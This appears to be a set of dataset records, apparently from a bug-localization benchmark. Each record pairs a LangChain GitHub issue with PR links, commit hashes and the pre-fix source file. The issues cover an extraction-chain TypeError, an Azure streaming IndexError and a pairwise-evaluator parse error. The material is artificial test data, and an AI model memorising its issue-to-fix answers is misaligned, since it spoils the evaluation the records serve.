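# Sketch of the reported TypeError and a tentative workaround.
from langchain.chains import create_extraction_chain
from langchain.chat_models import ChatOpenAI

llm = ChatOpenAI(model="gpt-3.5-turbo-0613", temperature=0)
schema = {
    "properties": {"name": {"type": "string"}, "height": {"type": "integer"}},
    "required": ["name"],
}

# create_extraction_chain(schema, llm, verbose=True)  # raises the TypeError above
chain = create_extraction_chain(schema, llm)
chain.verbose = True  # tentative workaround: set the field on the returned chain
```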
https://github.com/langchain-ai/langchain/issues/7982
https://github.com/langchain-ai/langchain/pull/7984
812a1643db9daac573f77f7cdbce3fea90ba0507
d6493590da3977b5077c13ff3aaad591f71637d6
"2023-07-20T06:39:12Z"
python
"2023-07-20T13:52:13Z"
langchain/chains/openai_functions/extraction.py
from typing import Any, List from pydantic import BaseModel from langchain.chains.base import Chain from langchain.chains.llm import LLMChain from langchain.chains.openai_functions.utils import ( _convert_schema, _resolve_schema_references, get_llm_kwargs, ) from langchain.output_parsers.openai_functions import ( JsonKeyOutputFunctionsParser, PydanticAttrOutputFunctionsParser, ) from langchain.prompts import ChatPromptTemplate from langchain.schema.language_model import BaseLanguageModel def _get_extraction_function(entity_schema: dict) -> dict: return { "name": "information_extraction", "description": "Extracts the relevant information from the passage.", "parameters": { "type": "object", "properties": { "info": {"type": "array", "items": _convert_schema(entity_schema)} }, "required": ["info"], }, } _EXTRACTION_TEMPLATE = """Extract and save the relevant entities mentioned\ in the following passage together with their properties. Only extract the properties mentioned in the 'information_extraction' function. If a property is not present and is not required in the function parameters, do not include it in the output. Passage: {input} """ # noqa: E501 def create_extraction_chain(schema: dict, llm: BaseLanguageModel) -> Chain: """Creates a chain that extracts information from a passage. Args: schema: The schema of the entities to extract. llm: The language model to use. Returns: Chain that can be used to extract information from a passage. """ function = _get_extraction_function(schema) prompt = ChatPromptTemplate.from_template(_EXTRACTION_TEMPLATE) output_parser = JsonKeyOutputFunctionsParser(key_name="info") llm_kwargs = get_llm_kwargs(function) chain = LLMChain( llm=llm, prompt=prompt, llm_kwargs=llm_kwargs, output_parser=output_parser, ) return chain def create_extraction_chain_pydantic( pydantic_schema: Any, llm: BaseLanguageModel ) -> Chain: """Creates a chain that extracts information from a passage using pydantic schema. Args: pydantic_schema: The pydantic schema of the entities to extract. llm: The language model to use. Returns: Chain that can be used to extract information from a passage. """ class PydanticSchema(BaseModel): info: List[pydantic_schema] # type: ignore openai_schema = pydantic_schema.schema() openai_schema = _resolve_schema_references( openai_schema, openai_schema.get("definitions", {}) ) function = _get_extraction_function(openai_schema) prompt = ChatPromptTemplate.from_template(_EXTRACTION_TEMPLATE) output_parser = PydanticAttrOutputFunctionsParser( pydantic_schema=PydanticSchema, attr_name="info" ) llm_kwargs = get_llm_kwargs(function) chain = LLMChain( llm=llm, prompt=prompt, llm_kwargs=llm_kwargs, output_parser=output_parser, ) return chain
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
6,462
AzureChatOpenAI Streaming causes IndexError: list index out of range
### System Info langchain-0.0.205-py3, macos ventura, python 3.11 ### Who can help? @hwchase17 / @agola11 ### Information - [x] The official example notebooks/scripts https://python.langchain.com/docs/modules/model_io/models/chat/how_to/streaming ### Related Components - [X] LLMs/Chat Models ### Reproduction ### Reproduction code ```python # test.py from langchain.chat_models import AzureChatOpenAI from langchain.chat_models import ChatOpenAI from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler from langchain.schema import ( HumanMessage, ) chat_1 = ChatOpenAI(streaming=True, callbacks=[StreamingStdOutCallbackHandler()], openai_api_key="SOME-KEY", model='gpt-3.5-turbo', temperature=0.7, request_timeout=60, max_retries=1) chat_2 = AzureChatOpenAI(streaming=True, callbacks=[StreamingStdOutCallbackHandler()], openai_api_base="https://some-org-openai.openai.azure.com/", openai_api_version="2023-06-01-preview", openai_api_key="SOME-KEY", deployment_name='gpt-3_5', temperature=0.7, request_timeout=60, max_retries=1) resp_1 = chat_1([HumanMessage(content="Write me a song about sparkling water.")]) resp_2 = chat_2([HumanMessage(content="Write me a song about sparkling water.")]) ``` ```shell python test.py ``` ### Output of command 1 (OpenAI) ```shell Verse 1: Bubbles dancing in my cup Refreshing taste, can't get enough Clear and crisp, it's always there A drink that's beyond compare Chorus: Sparkling water, oh how you shine You make my taste buds come alive With every sip, I feel so fine Sparkling water, you're one of a kind Verse 2: A drink that's light and calorie-free A healthier choice, it's plain to see A perfect thirst quencher, day or night With sparkling water, everything's right Chorus: Sparkling water, oh how you shine You make my taste buds come alive With every sip, I feel so fine Sparkling water, you're one of a kind Bridge: From the fizzy sensation to the bubbles popping You're the drink I never want to stop sipping Whether at a party or on my own Sparkling water, you're always in the zone Chorus: Sparkling water, oh how you shine You make my taste buds come alive With every sip, I feel so fine Sparkling water, you're one of a kind Outro: Sparkling water, you're my go-to A drink that always feels brand new With each sip, I'm left in awe Sparkling water, you're the perfect beverage ``` ### Output of command 2 (Azure OpenAI) ```shell raw.Traceback (most recent call last): File "/Users/someone/Development/test.py", line 29, in <module> resp_2 = chat_2([HumanMessage(content="Write me a song about sparkling water.")]) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/base.py", line 208, in __call__ generation = self.generate( ^^^^^^^^^^^^^^ File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/base.py", line 102, in generate raise e File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/base.py", line 94, in generate results = [ ^ File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/base.py", line 95, in <listcomp> self._generate(m, stop=stop, run_manager=run_manager, **kwargs) File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/openai.py", line 334, in _generate role = stream_resp["choices"][0]["delta"].get("role", role) ~~~~~~~~~~~~~~~~~~~~~~^^^ IndexError: list index out of range ``` ### Expected behavior I can't find anything in existing issues or documentation stating that there is a known bug 
in Azure OpenAI Service streaming.
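A defensive pattern along these lines skips the empty `choices` chunks that Azure can emit before content arrives; this is a sketch of the streaming loop body in `_generate`, showing the general shape of a guard, not necessarily the exact patch that shipped:

```python
# Sketch: guard the streaming loop against chunks with an empty choices list,
# which Azure OpenAI can emit (e.g. content-filter preamble chunks).
for stream_resp in self.completion_with_retry(messages=message_dicts, **params):
    if not stream_resp["choices"]:
        continue  # skip chunks that carry no delta
    delta = stream_resp["choices"][0]["delta"]
    role = delta.get("role", role)
    token = delta.get("content") or ""
    inner_completion += token
    if run_manager:
        run_manager.on_llm_new_token(token)
```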
https://github.com/langchain-ai/langchain/issues/6462
https://github.com/langchain-ai/langchain/pull/8241
c1ea8da9bc2986532d6f1db810996ee72d5a6c1c
0af48b06d00b23be65d0a10ff27aff4db0f6c85f
"2023-06-20T04:57:00Z"
python
"2023-07-25T18:30:22Z"
libs/langchain/langchain/chat_models/openai.py
"""OpenAI chat wrapper.""" from __future__ import annotations import logging import sys from typing import ( TYPE_CHECKING, Any, Callable, Dict, List, Mapping, Optional, Tuple, Union, ) from pydantic import Field, root_validator from tenacity import ( before_sleep_log, retry, retry_if_exception_type, stop_after_attempt, wait_exponential, ) from langchain.callbacks.manager import ( AsyncCallbackManagerForLLMRun, CallbackManagerForLLMRun, ) from langchain.chat_models.base import BaseChatModel from langchain.schema import ( ChatGeneration, ChatResult, ) from langchain.schema.messages import ( AIMessage, BaseMessage, ChatMessage, FunctionMessage, HumanMessage, SystemMessage, ) from langchain.utils import get_from_dict_or_env, get_pydantic_field_names if TYPE_CHECKING: import tiktoken logger = logging.getLogger(__name__) def _import_tiktoken() -> Any: try: import tiktoken except ImportError: raise ValueError( "Could not import tiktoken python package. " "This is needed in order to calculate get_token_ids. " "Please install it with `pip install tiktoken`." ) return tiktoken def _create_retry_decorator(llm: ChatOpenAI) -> Callable[[Any], Any]: import openai min_seconds = 1 max_seconds = 60 # Wait 2^x * 1 second between each retry starting with # 4 seconds, then up to 10 seconds, then 10 seconds afterwards return retry( reraise=True, stop=stop_after_attempt(llm.max_retries), wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds), retry=( retry_if_exception_type(openai.error.Timeout) | retry_if_exception_type(openai.error.APIError) | retry_if_exception_type(openai.error.APIConnectionError) | retry_if_exception_type(openai.error.RateLimitError) | retry_if_exception_type(openai.error.ServiceUnavailableError) ), before_sleep=before_sleep_log(logger, logging.WARNING), ) async def acompletion_with_retry(llm: ChatOpenAI, **kwargs: Any) -> Any: """Use tenacity to retry the async completion call.""" retry_decorator = _create_retry_decorator(llm) @retry_decorator async def _completion_with_retry(**kwargs: Any) -> Any: # Use OpenAI's async api https://github.com/openai/openai-python#async-api return await llm.client.acreate(**kwargs) return await _completion_with_retry(**kwargs) def _convert_dict_to_message(_dict: Mapping[str, Any]) -> BaseMessage: role = _dict["role"] if role == "user": return HumanMessage(content=_dict["content"]) elif role == "assistant": # Fix for azure # Also OpenAI returns None for tool invocations content = _dict.get("content", "") or "" if _dict.get("function_call"): additional_kwargs = {"function_call": dict(_dict["function_call"])} else: additional_kwargs = {} return AIMessage(content=content, additional_kwargs=additional_kwargs) elif role == "system": return SystemMessage(content=_dict["content"]) elif role == "function": return FunctionMessage(content=_dict["content"], name=_dict["name"]) else: return ChatMessage(content=_dict["content"], role=role) def _convert_message_to_dict(message: BaseMessage) -> dict: if isinstance(message, ChatMessage): message_dict = {"role": message.role, "content": message.content} elif isinstance(message, HumanMessage): message_dict = {"role": "user", "content": message.content} elif isinstance(message, AIMessage): message_dict = {"role": "assistant", "content": message.content} if "function_call" in message.additional_kwargs: message_dict["function_call"] = message.additional_kwargs["function_call"] elif isinstance(message, SystemMessage): message_dict = {"role": "system", "content": message.content} elif isinstance(message, 
FunctionMessage): message_dict = { "role": "function", "content": message.content, "name": message.name, } else: raise ValueError(f"Got unknown type {message}") if "name" in message.additional_kwargs: message_dict["name"] = message.additional_kwargs["name"] return message_dict class ChatOpenAI(BaseChatModel): """Wrapper around OpenAI Chat large language models. To use, you should have the ``openai`` python package installed, and the environment variable ``OPENAI_API_KEY`` set with your API key. Any parameters that are valid to be passed to the openai.create call can be passed in, even if not explicitly saved on this class. Example: .. code-block:: python from langchain.chat_models import ChatOpenAI openai = ChatOpenAI(model_name="gpt-3.5-turbo") """ @property def lc_secrets(self) -> Dict[str, str]: return {"openai_api_key": "OPENAI_API_KEY"} @property def lc_serializable(self) -> bool: return True client: Any #: :meta private: model_name: str = Field(default="gpt-3.5-turbo", alias="model") """Model name to use.""" temperature: float = 0.7 """What sampling temperature to use.""" model_kwargs: Dict[str, Any] = Field(default_factory=dict) """Holds any model parameters valid for `create` call not explicitly specified.""" openai_api_key: Optional[str] = None """Base URL path for API requests, leave blank if not using a proxy or service emulator.""" openai_api_base: Optional[str] = None openai_organization: Optional[str] = None # to support explicit proxy for OpenAI openai_proxy: Optional[str] = None request_timeout: Optional[Union[float, Tuple[float, float]]] = None """Timeout for requests to OpenAI completion API. Default is 600 seconds.""" max_retries: int = 6 """Maximum number of retries to make when generating.""" streaming: bool = False """Whether to stream the results or not.""" n: int = 1 """Number of chat completions to generate for each prompt.""" max_tokens: Optional[int] = None """Maximum number of tokens to generate.""" tiktoken_model_name: Optional[str] = None """The model name to pass to tiktoken when using this class. Tiktoken is used to count the number of tokens in documents to constrain them to be under a certain limit. By default, when set to None, this will be the same as the embedding model name. However, there are some cases where you may want to use this Embedding class with a model name not supported by tiktoken. This can include when using Azure embeddings or when using one of the many model providers that expose an OpenAI-like API but with different models. In those cases, in order to avoid erroring when tiktoken is called, you can specify a model name to use here.""" class Config: """Configuration for this pydantic object.""" allow_population_by_field_name = True @root_validator(pre=True) def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]: """Build extra kwargs from additional params that were passed in.""" all_required_field_names = get_pydantic_field_names(cls) extra = values.get("model_kwargs", {}) for field_name in list(values): if field_name in extra: raise ValueError(f"Found {field_name} supplied twice.") if field_name not in all_required_field_names: logger.warning( f"""WARNING! {field_name} is not default parameter. {field_name} was transferred to model_kwargs. Please confirm that {field_name} is what you intended.""" ) extra[field_name] = values.pop(field_name) invalid_model_kwargs = all_required_field_names.intersection(extra.keys()) if invalid_model_kwargs: raise ValueError( f"Parameters {invalid_model_kwargs} should be specified explicitly. 
" f"Instead they were passed in as part of `model_kwargs` parameter." ) values["model_kwargs"] = extra return values @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" values["openai_api_key"] = get_from_dict_or_env( values, "openai_api_key", "OPENAI_API_KEY" ) values["openai_organization"] = get_from_dict_or_env( values, "openai_organization", "OPENAI_ORGANIZATION", default="", ) values["openai_api_base"] = get_from_dict_or_env( values, "openai_api_base", "OPENAI_API_BASE", default="", ) values["openai_proxy"] = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) try: import openai except ImportError: raise ValueError( "Could not import openai python package. " "Please install it with `pip install openai`." ) try: values["client"] = openai.ChatCompletion except AttributeError: raise ValueError( "`openai` has no `ChatCompletion` attribute, this is likely " "due to an old version of the openai package. Try upgrading it " "with `pip install --upgrade openai`." ) if values["n"] < 1: raise ValueError("n must be at least 1.") if values["n"] > 1 and values["streaming"]: raise ValueError("n must be 1 when streaming.") return values @property def _default_params(self) -> Dict[str, Any]: """Get the default parameters for calling OpenAI API.""" return { "model": self.model_name, "request_timeout": self.request_timeout, "max_tokens": self.max_tokens, "stream": self.streaming, "n": self.n, "temperature": self.temperature, **self.model_kwargs, } def completion_with_retry(self, **kwargs: Any) -> Any: """Use tenacity to retry the completion call.""" retry_decorator = _create_retry_decorator(self) @retry_decorator def _completion_with_retry(**kwargs: Any) -> Any: return self.client.create(**kwargs) return _completion_with_retry(**kwargs) def _combine_llm_outputs(self, llm_outputs: List[Optional[dict]]) -> dict: overall_token_usage: dict = {} for output in llm_outputs: if output is None: # Happens in streaming continue token_usage = output["token_usage"] for k, v in token_usage.items(): if k in overall_token_usage: overall_token_usage[k] += v else: overall_token_usage[k] = v return {"token_usage": overall_token_usage, "model_name": self.model_name} def _generate( self, messages: List[BaseMessage], stop: Optional[List[str]] = None, run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> ChatResult: message_dicts, params = self._create_message_dicts(messages, stop) params = {**params, **kwargs} if self.streaming: inner_completion = "" role = "assistant" params["stream"] = True function_call: Optional[dict] = None for stream_resp in self.completion_with_retry( messages=message_dicts, **params ): role = stream_resp["choices"][0]["delta"].get("role", role) token = stream_resp["choices"][0]["delta"].get("content") or "" inner_completion += token _function_call = stream_resp["choices"][0]["delta"].get("function_call") if _function_call: if function_call is None: function_call = _function_call else: function_call["arguments"] += _function_call["arguments"] if run_manager: run_manager.on_llm_new_token(token) message = _convert_dict_to_message( { "content": inner_completion, "role": role, "function_call": function_call, } ) return ChatResult(generations=[ChatGeneration(message=message)]) response = self.completion_with_retry(messages=message_dicts, **params) return self._create_chat_result(response) def _create_message_dicts( self, messages: List[BaseMessage], stop: 
Optional[List[str]] ) -> Tuple[List[Dict[str, Any]], Dict[str, Any]]: params = self._client_params if stop is not None: if "stop" in params: raise ValueError("`stop` found in both the input and default params.") params["stop"] = stop message_dicts = [_convert_message_to_dict(m) for m in messages] return message_dicts, params def _create_chat_result(self, response: Mapping[str, Any]) -> ChatResult: generations = [] for res in response["choices"]: message = _convert_dict_to_message(res["message"]) gen = ChatGeneration( message=message, generation_info=dict(finish_reason=res.get("finish_reason")), ) generations.append(gen) token_usage = response.get("usage", {}) llm_output = {"token_usage": token_usage, "model_name": self.model_name} return ChatResult(generations=generations, llm_output=llm_output) async def _agenerate( self, messages: List[BaseMessage], stop: Optional[List[str]] = None, run_manager: Optional[AsyncCallbackManagerForLLMRun] = None, **kwargs: Any, ) -> ChatResult: message_dicts, params = self._create_message_dicts(messages, stop) params = {**params, **kwargs} if self.streaming: inner_completion = "" role = "assistant" params["stream"] = True function_call: Optional[dict] = None async for stream_resp in await acompletion_with_retry( self, messages=message_dicts, **params ): role = stream_resp["choices"][0]["delta"].get("role", role) token = stream_resp["choices"][0]["delta"].get("content", "") inner_completion += token or "" _function_call = stream_resp["choices"][0]["delta"].get("function_call") if _function_call: if function_call is None: function_call = _function_call else: function_call["arguments"] += _function_call["arguments"] if run_manager: await run_manager.on_llm_new_token(token) message = _convert_dict_to_message( { "content": inner_completion, "role": role, "function_call": function_call, } ) return ChatResult(generations=[ChatGeneration(message=message)]) else: response = await acompletion_with_retry( self, messages=message_dicts, **params ) return self._create_chat_result(response) @property def _identifying_params(self) -> Dict[str, Any]: """Get the identifying parameters.""" return {**{"model_name": self.model_name}, **self._default_params} @property def _client_params(self) -> Dict[str, Any]: """Get the parameters used for the openai client.""" openai_creds: Dict[str, Any] = { "api_key": self.openai_api_key, "api_base": self.openai_api_base, "organization": self.openai_organization, "model": self.model_name, } if self.openai_proxy: import openai openai.proxy = {"http": self.openai_proxy, "https": self.openai_proxy} # type: ignore[assignment] # noqa: E501 return {**self._default_params, **openai_creds} def _get_invocation_params( self, stop: Optional[List[str]] = None, **kwargs: Any ) -> Dict[str, Any]: """Get the parameters used to invoke the model.""" return { "model": self.model_name, **super()._get_invocation_params(stop=stop), **self._default_params, **kwargs, } @property def _llm_type(self) -> str: """Return type of chat model.""" return "openai-chat" def _get_encoding_model(self) -> Tuple[str, tiktoken.Encoding]: tiktoken_ = _import_tiktoken() if self.tiktoken_model_name is not None: model = self.tiktoken_model_name else: model = self.model_name if model == "gpt-3.5-turbo": # gpt-3.5-turbo may change over time. # Returning num tokens assuming gpt-3.5-turbo-0301. model = "gpt-3.5-turbo-0301" elif model == "gpt-4": # gpt-4 may change over time. # Returning num tokens assuming gpt-4-0314. 
model = "gpt-4-0314" # Returns the number of tokens used by a list of messages. try: encoding = tiktoken_.encoding_for_model(model) except KeyError: logger.warning("Warning: model not found. Using cl100k_base encoding.") model = "cl100k_base" encoding = tiktoken_.get_encoding(model) return model, encoding def get_token_ids(self, text: str) -> List[int]: """Get the tokens present in the text with tiktoken package.""" # tiktoken NOT supported for Python 3.7 or below if sys.version_info[1] <= 7: return super().get_token_ids(text) _, encoding_model = self._get_encoding_model() return encoding_model.encode(text) def get_num_tokens_from_messages(self, messages: List[BaseMessage]) -> int: """Calculate num tokens for gpt-3.5-turbo and gpt-4 with tiktoken package. Official documentation: https://github.com/openai/openai-cookbook/blob/ main/examples/How_to_format_inputs_to_ChatGPT_models.ipynb""" if sys.version_info[1] <= 7: return super().get_num_tokens_from_messages(messages) model, encoding = self._get_encoding_model() if model.startswith("gpt-3.5-turbo"): # every message follows <im_start>{role/name}\n{content}<im_end>\n tokens_per_message = 4 # if there's a name, the role is omitted tokens_per_name = -1 elif model.startswith("gpt-4"): tokens_per_message = 3 tokens_per_name = 1 else: raise NotImplementedError( f"get_num_tokens_from_messages() is not presently implemented " f"for model {model}." "See https://github.com/openai/openai-python/blob/main/chatml.md for " "information on how messages are converted to tokens." ) num_tokens = 0 messages_dict = [_convert_message_to_dict(m) for m in messages] for message in messages_dict: num_tokens += tokens_per_message for key, value in message.items(): num_tokens += len(encoding.encode(value)) if key == "name": num_tokens += tokens_per_name # every reply is primed with <im_start>assistant num_tokens += 3 return num_tokens
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,272
not enough values to unpack (expected 2, got 1) while LabeledPairwiseStringEvalChain with evaluate_string_pairs
### System Info platform = mac m2 python = 3.11 ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` prompt_template = PromptTemplate.from_template( """Given the input context and the reference, analyze and determine which prediction, A or B, aligns most closely with the reference label. Consider the following factors while analyzing: - Relevance to the input context - Semantic similarity with the reference label - Consistency with any specifics mentioned in the input The DATA for this decision are as follows: Input Context: {input} Reference Label: {reference} Option A: {prediction} Option B: {prediction_b} After analyzing, provide the reasoning for your selection, and finally, respond with either [[A]] or [[B]] on its own line. In the case that both options are equally similar, default to option [[A]]. --- Reasoning: """ ) evaluation_chain = LabeledPairwiseStringEvalChain.from_llm( llm=llm, prompt=prompt_template ) result = evaluation_chain.evaluate_string_pairs( input=self.currentQuery, prediction=response1, prediction_b=response2, reference=self.formatSourcesStructure(sourcedocs), ) ``` Sometimes it fails with an error like ``` not enough values to unpack (expected 2, got 1) ``` This happens on roughly one out of every 3-4 requests: one request fails with this error, and the next request then returns a response normally. ### Expected behavior There should be no error, and a valid response should be returned.
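The error points at the chain's output parser, which calls `text.strip().rsplit("\n", maxsplit=1)` and unpacks two values: when the model puts the verdict on the same line as the reasoning, the split yields a single element and the unpack fails. A minimal illustration follows; the two strings below mimic model outputs and are assumptions:

```python
# Minimal illustration of the "not enough values to unpack" failure mode.
good = "Option A is closer to the reference label.\n[[A]]"
bad = "Option A is closer to the reference label, so [[A]]"  # no newline

reasoning, verdict = good.strip().rsplit("\n", maxsplit=1)  # works
try:
    reasoning, verdict = bad.strip().rsplit("\n", maxsplit=1)
except ValueError as err:
    print(err)  # not enough values to unpack (expected 2, got 1)
```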
https://github.com/langchain-ai/langchain/issues/8272
https://github.com/langchain-ai/langchain/pull/8278
9cbefcc56cbce50e1f6d9392c17e15415d55b7ba
adf019724f095b1835040f4dd8c1ff0026cbc729
"2023-07-26T07:20:57Z"
python
"2023-07-26T08:53:22Z"
libs/langchain/langchain/evaluation/comparison/eval_chain.py
"""Base classes for comparing the output of two models.""" from __future__ import annotations from typing import Any, Dict, List, Optional from pydantic import Extra, Field from langchain.callbacks.manager import Callbacks from langchain.chains.llm import LLMChain from langchain.evaluation.comparison.prompt import PROMPT, PROMPT_WITH_REFERENCE from langchain.evaluation.schema import LLMEvalChain, PairwiseStringEvaluator from langchain.prompts.prompt import PromptTemplate from langchain.schema import RUN_KEY, BaseOutputParser from langchain.schema.language_model import BaseLanguageModel class PairwiseStringResultOutputParser(BaseOutputParser[dict]): """A parser for the output of the PairwiseStringEvalChain. Attributes: _type (str): The type of the output parser. """ @property def _type(self) -> str: """Return the type of the output parser. Returns: str: The type of the output parser. """ return "pairwise_string_result" def parse(self, text: str) -> Any: """Parse the output text. Args: text (str): The output text to parse. Returns: Any: The parsed output. Raises: ValueError: If the verdict is invalid. """ reasoning, verdict = text.strip().rsplit("\n", maxsplit=1) verdict = verdict.strip("[").strip("]") if verdict not in {"A", "B", "C"}: raise ValueError( f"Invalid verdict: {verdict}. " "Verdict must be one of 'A', 'B', or 'C'." ) # C means the models are tied. Return 'None' meaning no preference verdict_ = None if verdict == "C" else verdict score = { "A": 1, "B": 0, None: 0.5, }.get(verdict_) return { "reasoning": reasoning, "value": verdict_, "score": score, } class PairwiseStringEvalChain(PairwiseStringEvaluator, LLMEvalChain, LLMChain): """A chain for comparing two outputs, such as the outputs of two models, prompts, or outputs of a single model on similar inputs. Attributes: output_parser (BaseOutputParser): The output parser for the chain. Example: >>> from langchain.chat_models import ChatOpenAI >>> from langchain.evaluation.comparison import PairwiseStringEvalChain >>> llm = ChatOpenAI(temperature=0) >>> chain = PairwiseStringEvalChain.from_llm(llm=llm) >>> result = chain.evaluate_string_pairs( ... input = "What is the chemical formula for water?", ... prediction = "H2O", ... prediction_b = ( ... "The chemical formula for water is H2O, which means" ... " there are two hydrogen atoms and one oxygen atom." ... reference = "The chemical formula for water is H2O.", ... ) >>> print(result["text"]) # { # "value": "B", # "comment": "Both responses accurately state" # " that the chemical formula for water is H2O." # " However, Response B provides additional information" # . " by explaining what the formula means.\\n[[B]]" # } """ output_key: str = "results" #: :meta private: output_parser: BaseOutputParser = Field( default_factory=PairwiseStringResultOutputParser ) class Config: """Configuration for the PairwiseStringEvalChain.""" extra = Extra.ignore @property def requires_reference(self) -> bool: """Return whether the chain requires a reference. Returns: bool: True if the chain requires a reference, False otherwise. """ return False @property def requires_input(self) -> bool: """Return whether the chain requires an input. Returns: bool: True if the chain requires an input, False otherwise. """ return True @property def _skip_reference_warning(self) -> str: """Return the warning to show when reference is ignored. Returns: str: The warning to show when reference is ignored. """ return ( f"Ignoring reference in {self.__class__.__name__}, as it is not expected." 
"\nTo use a reference, use the LabeledPairwiseStringEvalChain" " (EvaluatorType.LABELED_PAIRWISE_STRING) instead." ) @classmethod def from_llm( cls, llm: BaseLanguageModel, *, prompt: Optional[PromptTemplate] = None, **kwargs: Any, ) -> PairwiseStringEvalChain: """Initialize the PairwiseStringEvalChain from an LLM. Args: llm (BaseLanguageModel): The LLM to use. prompt (PromptTemplate, optional): The prompt to use. **kwargs (Any): Additional keyword arguments. Returns: PairwiseStringEvalChain: The initialized PairwiseStringEvalChain. Raises: ValueError: If the input variables are not as expected. """ expected_input_vars = {"prediction", "prediction_b", "input"} prompt_ = prompt or PROMPT if expected_input_vars != set(prompt_.input_variables): raise ValueError( f"Input variables should be {expected_input_vars}, " f"but got {prompt_.input_variables}" ) return cls(llm=llm, prompt=prompt_, **kwargs) def _prepare_input( self, prediction: str, prediction_b: str, input: Optional[str], reference: Optional[str], ) -> dict: """Prepare the input for the chain. Args: prediction (str): The output string from the first model. prediction_b (str): The output string from the second model. input (str, optional): The input or task string. reference (str, optional): The reference string, if any. Returns: dict: The prepared input for the chain. """ input_ = { "prediction": prediction, "prediction_b": prediction_b, "input": input, } if self.requires_reference: input_["reference"] = reference return input_ def _prepare_output(self, result: dict) -> dict: """Prepare the output.""" parsed = result[self.output_key] if RUN_KEY in result: parsed[RUN_KEY] = result[RUN_KEY] return parsed def _evaluate_string_pairs( self, *, prediction: str, prediction_b: str, input: Optional[str] = None, reference: Optional[str] = None, callbacks: Callbacks = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, include_run_info: bool = False, **kwargs: Any, ) -> dict: """Evaluate whether output A is preferred to output B. Args: prediction (str): The output string from the first model. prediction_b (str): The output string from the second model. input (str, optional): The input or task string. callbacks (Callbacks, optional): The callbacks to use. reference (str, optional): The reference string, if any. **kwargs (Any): Additional keyword arguments. Returns: dict: A dictionary containing: - reasoning: The reasoning for the preference. - value: The preference value, which is either 'A', 'B', or None for no preference. - score: The preference score, which is 1 for 'A', 0 for 'B', and 0.5 for None. """ input_ = self._prepare_input(prediction, prediction_b, input, reference) result = self( inputs=input_, callbacks=callbacks, tags=tags, metadata=metadata, include_run_info=include_run_info, ) return self._prepare_output(result) async def _aevaluate_string_pairs( self, *, prediction: str, prediction_b: str, reference: Optional[str] = None, input: Optional[str] = None, callbacks: Callbacks = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, include_run_info: bool = False, **kwargs: Any, ) -> dict: """Asynchronously evaluate whether output A is preferred to output B. Args: prediction (str): The output string from the first model. prediction_b (str): The output string from the second model. input (str, optional): The input or task string. callbacks (Callbacks, optional): The callbacks to use. reference (str, optional): The reference string, if any. 
**kwargs (Any): Additional keyword arguments. Returns: dict: A dictionary containing: - reasoning: The reasoning for the preference. - value: The preference value, which is either 'A', 'B', or None for no preference. - score: The preference score, which is 1 for 'A', 0 for 'B', and 0.5 for None. """ input_ = self._prepare_input(prediction, prediction_b, input, reference) result = await self.acall( inputs=input_, callbacks=callbacks, tags=tags, metadata=metadata, include_run_info=include_run_info, ) return self._prepare_output(result) class LabeledPairwiseStringEvalChain(PairwiseStringEvalChain): """A chain for comparing two outputs, such as the outputs of two models, prompts, or outputs of a single model on similar inputs, with labeled preferences. Attributes: output_parser (BaseOutputParser): The output parser for the chain. """ @property def requires_reference(self) -> bool: """Return whether the chain requires a reference. Returns: bool: True if the chain requires a reference, False otherwise. """ return True @classmethod def from_llm( cls, llm: BaseLanguageModel, *, prompt: Optional[PromptTemplate] = None, **kwargs: Any, ) -> PairwiseStringEvalChain: """Initialize the LabeledPairwiseStringEvalChain from an LLM. Args: llm (BaseLanguageModel): The LLM to use. prompt (PromptTemplate, optional): The prompt to use. **kwargs (Any): Additional keyword arguments. Returns: LabeledPairwiseStringEvalChain: The initialized LabeledPairwiseStringEvalChain. Raises: ValueError: If the input variables are not as expected. """ # noqa: E501 expected_input_vars = {"prediction", "prediction_b", "input", "reference"} prompt_ = prompt or PROMPT_WITH_REFERENCE if expected_input_vars != set(prompt_.input_variables): raise ValueError( f"Input variables should be {expected_input_vars}, " f"but got {prompt_.input_variables}" ) return cls(llm=llm, prompt=prompt_, **kwargs)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,272
not enough values to unpack (expected 2, got 1) while LabeledPairwiseStringEvalChain with evaluate_string_pairs
### System Info platform = mac m2 python = 3.11 ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` prompt_template = PromptTemplate.from_template( """Given the input context and the reference, analyze and determine which prediction, A or B, aligns most closely with the reference label. Consider the following factors while analyzing: - Relevance to the input context - Semantic similarity with the reference label - Consistency with any specifics mentioned in the input The DATA for this decision are as follows: Input Context: {input} Reference Label: {reference} Option A: {prediction} Option B: {prediction_b} After analyzing, provide the reasoning for your selection, and finally, respond with either [[A]] or [[B]] on its own line. In the case that both options are equally similar, default to option [[A]]. --- Reasoning: """ ) evaluation_chain = LabeledPairwiseStringEvalChain.from_llm( 